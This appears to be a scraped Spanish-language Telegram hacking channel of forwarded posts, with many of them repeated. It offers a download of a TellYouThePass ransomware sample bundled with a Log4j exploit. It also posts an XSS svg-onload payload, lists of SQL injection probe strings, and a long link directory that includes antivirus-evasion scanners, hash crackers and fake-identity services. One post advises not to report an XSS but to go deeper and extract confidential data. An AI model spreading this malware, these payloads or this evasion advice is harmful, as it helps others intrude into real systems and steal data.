LOG4J RAMSOMWARE
👇👇👇👇👇👇👇👇👇
Ya tiene un mes más o menos que traigo este ejemplo que me enviaron unos amigos para su análisis.
Este usa el nuevo bug de LOG4J. Este es esponsable de revivir una cepa de ransomware que ha estado inactiva durante los últimos dos años. TellYouThePass no se ha encontrado en la naturaleza desde julio de 2020, pero ahora ha reaparecido y es una de las amenazas de ransomware más activas que utilizan Log4J.
Este malware contiene un exploit unido que hace uso de LOG4J.
°°°°°°°°°°°°°°
DESCAGAR
👇👇👇👇👇
👇👇👇👇👇👇👇👇👇
Ya tiene un mes más o menos que traigo este ejemplo que me enviaron unos amigos para su análisis.
Este usa el nuevo bug de LOG4J. Este es esponsable de revivir una cepa de ransomware que ha estado inactiva durante los últimos dos años. TellYouThePass no se ha encontrado en la naturaleza desde julio de 2020, pero ahora ha reaparecido y es una de las amenazas de ransomware más activas que utilizan Log4J.
Este malware contiene un exploit unido que hace uso de LOG4J.
°°°°°°°°°°°°°°
DESCAGAR
👇👇👇👇👇
Forwarded from Deleted Account
Aqui un PAYLOAD XSS para cuando tengan donde practicar y no se acepten los mas básicos
*****************************
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
******************************
*****************************
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
******************************
Forwarded from ӉѦСҠіИԌ ҬЄѦӍ СѦИѦL ѺҒіСіѦL DіҒԱՏіóИ
[Exploit Databases]
http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/
[Vulnerabilities Database]
https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
https://buildsecurityin.us-cert.gov/swa/...-databases
https://www.blackducksoftware.com/soluti...curity/nvd
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
https://www.owasp.org/index.php/OWASP_Vu...ry_Project
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/
[Hacking Tutorials]
https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/
[Virus Scan]
https://www.virustotal.com/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it
--Not distribute to AV--
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/
[Tools Download]
http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/
[Network Online Tools]
http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/
[IP Lookup]
http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/
[Encrypt / Decrypt ]
http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://encryption.online-toolz.com/tools...yption.php
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/
[Online Hash Crackers]
http://www.hashkiller.co.uk/
http://www.md5online.org/
http://www.cmd5.org/
http://www.md5crack.com/
http://www.netmd5crack.com/cracker/
http://md5decryption.com/
http://md5.rednoize.com/
http://www.md5this.com/index.php
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
https://hdb.insidepro.com/en
https://crackstation.net/
http://www.cloudcracker.net/
https://isc.sans.edu/tools/reversehash.html
http://www.onlinehashcrack.com/ [$]
http://hashcrack.in/en [$]
[File Upload]
https://mega.co.nz/
https://www.mediafire.com/
https://infotomb.com/m/welcome
http://sharesend.com/
http://www.wss-coding.com/upload
http://zippyshare.com/
http://filetolink.com/
http://ge.tt/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
http://secureupload.eu/
[Anonymous Test]
http://ipleak.net/
https://www.dnsleaktest.com/
https://diafygi.github.io/webrtc-ips/
[Tor Exit Node Check]
http://5deqglhxcoy3gbx6.onion - Xenobite
http://tmkloc6vhxos3nde.onion
[SMS]
http://receive-sms-now.com/
http://www.receive-sms-online.info/
http://www.receivesmsonline.net/
[Fake Identity]
http://www.fakenamegenerator.com/
https://fakena.me/
http://names.igopaygo.com/people/fake_person
http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/
[Vulnerabilities Database]
https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
https://buildsecurityin.us-cert.gov/swa/...-databases
https://www.blackducksoftware.com/soluti...curity/nvd
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
https://www.owasp.org/index.php/OWASP_Vu...ry_Project
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/
[Hacking Tutorials]
https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/
[Virus Scan]
https://www.virustotal.com/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it
--Not distribute to AV--
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/
[Tools Download]
http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/
[Network Online Tools]
http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/
[IP Lookup]
http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/
[Encrypt / Decrypt ]
http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://encryption.online-toolz.com/tools...yption.php
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/
[Online Hash Crackers]
http://www.hashkiller.co.uk/
http://www.md5online.org/
http://www.cmd5.org/
http://www.md5crack.com/
http://www.netmd5crack.com/cracker/
http://md5decryption.com/
http://md5.rednoize.com/
http://www.md5this.com/index.php
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
https://hdb.insidepro.com/en
https://crackstation.net/
http://www.cloudcracker.net/
https://isc.sans.edu/tools/reversehash.html
http://www.onlinehashcrack.com/ [$]
http://hashcrack.in/en [$]
[File Upload]
https://mega.co.nz/
https://www.mediafire.com/
https://infotomb.com/m/welcome
http://sharesend.com/
http://www.wss-coding.com/upload
http://zippyshare.com/
http://filetolink.com/
http://ge.tt/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
http://secureupload.eu/
[Anonymous Test]
http://ipleak.net/
https://www.dnsleaktest.com/
https://diafygi.github.io/webrtc-ips/
[Tor Exit Node Check]
http://5deqglhxcoy3gbx6.onion - Xenobite
http://tmkloc6vhxos3nde.onion
[SMS]
http://receive-sms-now.com/
http://www.receive-sms-online.info/
http://www.receivesmsonline.net/
[Fake Identity]
http://www.fakenamegenerator.com/
https://fakena.me/
http://names.igopaygo.com/people/fake_person
Exploit-Db
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
Forwarded from СүѣЄГՏЄСҬЄѦӍӉԱИҬЄГ
Hemos actualizado la colección maestra de VXUG. Ahora tenemos 1.500.000 muestras de malware disponibles para descargar. * Solo PE, ELF, ZIP / APK * Tamaño del bloque: 10,000 binarios * Se permite la descarga de archivos individuales Que tengas un buen año nuevo, saludos al 2022. Compruébalo aquí: https://vx-underground.org
Forwarded from PrOFeSoR X - Malware analisis
RECUERDEN AMIGOS ESTO
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
SI ENCUENTRAS UN XSS NO LO REPORTES por qué quedará como baja peligrosidad, Mejor ve más adentro y trata de obtener:
👉 Ya sea un DOM
👉 Ver si existe un CSRF.
👉 Analizar si existen direcciones de correo electrónico
👉 Encontrar cualquier información confidencial.
-----------------------------------------
Esto al menos hará que la gravedad de tus informes pasen a ser de
ALTA.PELIGROSIDAD.
°°°°°°°°°°°°°°°°°°°
ESTE consejo les doy por qué Popeye el marino soy.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
SI ENCUENTRAS UN XSS NO LO REPORTES por qué quedará como baja peligrosidad, Mejor ve más adentro y trata de obtener:
👉 Ya sea un DOM
👉 Ver si existe un CSRF.
👉 Analizar si existen direcciones de correo electrónico
👉 Encontrar cualquier información confidencial.
-----------------------------------------
Esto al menos hará que la gravedad de tus informes pasen a ser de
ALTA.PELIGROSIDAD.
°°°°°°°°°°°°°°°°°°°
ESTE consejo les doy por qué Popeye el marino soy.
Forwarded from Deleted Account
Bash_Guide_For_Beginners_Everything_You_Need_To_Know_About_Bash.epub
1.8 MB
Forwarded from Deleted Account
**> Sabian que en en la CVE del año 1999 hubo CVE-1999-1598 vulnerabiliades registradas y la ultima vulnerabilidad registrada fue:
-----------------------------------------
NT Domain DoS and Security Exploit with SAMBA Server
___________________________
**> En el año 2021 hubo 46109 +- y la utlima vulnerbilidad registrada de ese año fue:
--------------------------------
Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.
-------------------------------
-----------------------------------------
NT Domain DoS and Security Exploit with SAMBA Server
___________________________
**> En el año 2021 hubo 46109 +- y la utlima vulnerbilidad registrada de ese año fue:
--------------------------------
Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.
-------------------------------
Forwarded from Deleted Account
**> En el año 2020 hubo 9999 vulnerabilidades registradas y la ultima fue:
---------------------------------
A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iTunes for Windows 12.10.9. Processing a maliciously crafted text file may lead to arbitrary code execution.
---------------------------------
Si se dan cuenta entre el 2020 y 2021 hubo un aumento del casi 400% en vulnerabilidades.....
woooowwww y vamos por mas......
---------------------------------
A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iTunes for Windows 12.10.9. Processing a maliciously crafted text file may lead to arbitrary code execution.
---------------------------------
Si se dan cuenta entre el 2020 y 2021 hubo un aumento del casi 400% en vulnerabilidades.....
woooowwww y vamos por mas......
Forwarded from PrOFeSoR X - Malware analisis
Bug Bounty Tips****
Estos tips no son aptos para los que sienten que con el hacking apagan el infierno a soplidos.
Pero ahí les van algunos tips que se usan para encontrar facilmente sql-Injection 100%
°°°°°°°°°°°°°°°°°°°°°°°
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()
#x25hackingnews #sqli #profesorx
Bug Bounty Tips
****
Estos tips no son aptos para los que sienten que con el hacking apagan el infierno a soplidos.
Pero ahí les van algunos tips que se usan para encontrar facilmente sql-Injection 100%
°°°°°°°°°°°°°°°°°°°°°°°
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()
#x25hackingnews #sqli #profesorx
****
Estos tips no son aptos para los que sienten que con el hacking apagan el infierno a soplidos.
Pero ahí les van algunos tips que se usan para encontrar facilmente sql-Injection 100%
°°°°°°°°°°°°°°°°°°°°°°°
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()
#x25hackingnews #sqli #profesorx
Forwarded from Deleted Account
Tipos de payloads SQLI
***
1.- Boolean-based blind
2.- Error-based
3.- Union query-based
4.- Stacked queries
5.- Time-based blind
6.- Inline queries
******
Boolean-based blind
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
Significa que la vulnerabilidad se basa en valores booleanos (true or false) y se dice que es ciega por que no muetra alguna señal de que hay un error en la página.
Error-based
¨¨¨¨¨¨¨¨¨¨¨¨
Error-based significa que la inyeccion se basa en los mensajes de error que el servidor responde y asi conocer un poco mas sobre la estructura de la base de datos que se esta usando.¨
Union query-based
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Union query-based significa que estamos aprovechando que el operador UNION de sql puede ser usado, gracias a esto podemos combinar declaraciones que serán visualizadas como parte de la respuesta del servidor.
Inline queries
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Inline queries consiste en unir una query sql dentro de otra y asi sucesivamente para ver si la sentencia es ejecutada.
#x25hackingnews
***
1.- Boolean-based blind
2.- Error-based
3.- Union query-based
4.- Stacked queries
5.- Time-based blind
6.- Inline queries
******
Boolean-based blind
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
Significa que la vulnerabilidad se basa en valores booleanos (true or false) y se dice que es ciega por que no muetra alguna señal de que hay un error en la página.
Error-based
¨¨¨¨¨¨¨¨¨¨¨¨
Error-based significa que la inyeccion se basa en los mensajes de error que el servidor responde y asi conocer un poco mas sobre la estructura de la base de datos que se esta usando.¨
Union query-based
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Union query-based significa que estamos aprovechando que el operador UNION de sql puede ser usado, gracias a esto podemos combinar declaraciones que serán visualizadas como parte de la respuesta del servidor.
Inline queries
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Inline queries consiste en unir una query sql dentro de otra y asi sucesivamente para ver si la sentencia es ejecutada.
#x25hackingnews